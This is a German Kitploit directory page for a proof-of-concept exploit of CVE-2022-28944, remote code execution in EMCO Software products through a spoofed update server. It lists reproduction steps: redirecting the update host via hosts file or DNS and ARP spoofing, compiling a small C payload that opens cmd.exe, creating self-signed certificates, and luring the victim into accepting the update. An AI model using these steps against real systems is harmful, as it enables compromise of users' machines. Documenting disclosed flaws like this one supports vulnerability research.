Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2022-28944 — Proof-of-Concept-Exploit für nicht authentifizierte Remote-Codeausführung in EMCO-Softwareprodukten über DNS-Spoofing und bösartige Update-Injektion. | Kitploit
Tools/GitHubGitHub/gar-re/cve-2022-28944
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlRemote-Access-ToolPayload-Entwicklung
GitHubgar-re/cve-2022-28944

cve-2022-28944

Proof-of-Concept-Exploit für nicht authentifizierte Remote-Codeausführung in EMCO-Softwareprodukten über DNS-Spoofing und bösartige Update-Injektion.

Repository anzeigen
413vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-28944

Sicherheitslücke bezüglich nicht authentifizierter Remote-Codeausführung über Updates in mehreren Produkten von EMCO Software.

Verwendung: python3 cve-2022-28944_poc.py

Details im Bericht auf gerr.re.

Schritte zur Reproduktion

  1. Installieren Sie ein betroffenes Produkt von EMCO Software;
  2. Setzen Sie die Spoof-Adresse storage.emcosoftware.com auf unsere Angreifer-IP;
    • Bearbeiten Sie für einen Proof-of-Concept c:\windows\system32\drivers\etc\hosts auf dem Zielsystem.
      • Hinweis: Angreifer können z. B. Folgendes verwenden:
        • schlecht konfigurierte Router/Switches/DNS,
        • DNS-Spoofing / Cache-Poisoning,
        • ARP-Spoofing / Cache-Poisoning.
  3. Kompilieren Sie proof.c auf dem Angreifer, z. B. mit i686-w64-mingw32-gcc proof.c -o proof.exe;
root@kitploit:~
#include <windows.h>
int main(int argc, char const *argv[]){	
	WinExec("cmd.exe",1);
	return TRUE;
}
  1. Erzeugen Sie selbstsignierte Zertifikate;
    • z. B. mit openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"
  2. Führen Sie das Proof-of-Concept-Skript aus;
  3. Starten Sie das betroffene Produkt von EMCO Software und warten Sie entweder
    • warten Sie einen Tag, bis das Update automatisch ausgelöst wird, oder
    • lösen Sie das Update manuell über das Anwendungsmenü aus;
  4. Akzeptieren Sie das Update im Update-Assistenten.
    • Angreifer werden eine überzeugende Update-Beschreibung verwenden, um ein Ziel dazu zu bringen, das Update zu akzeptieren.
Tool herunterladen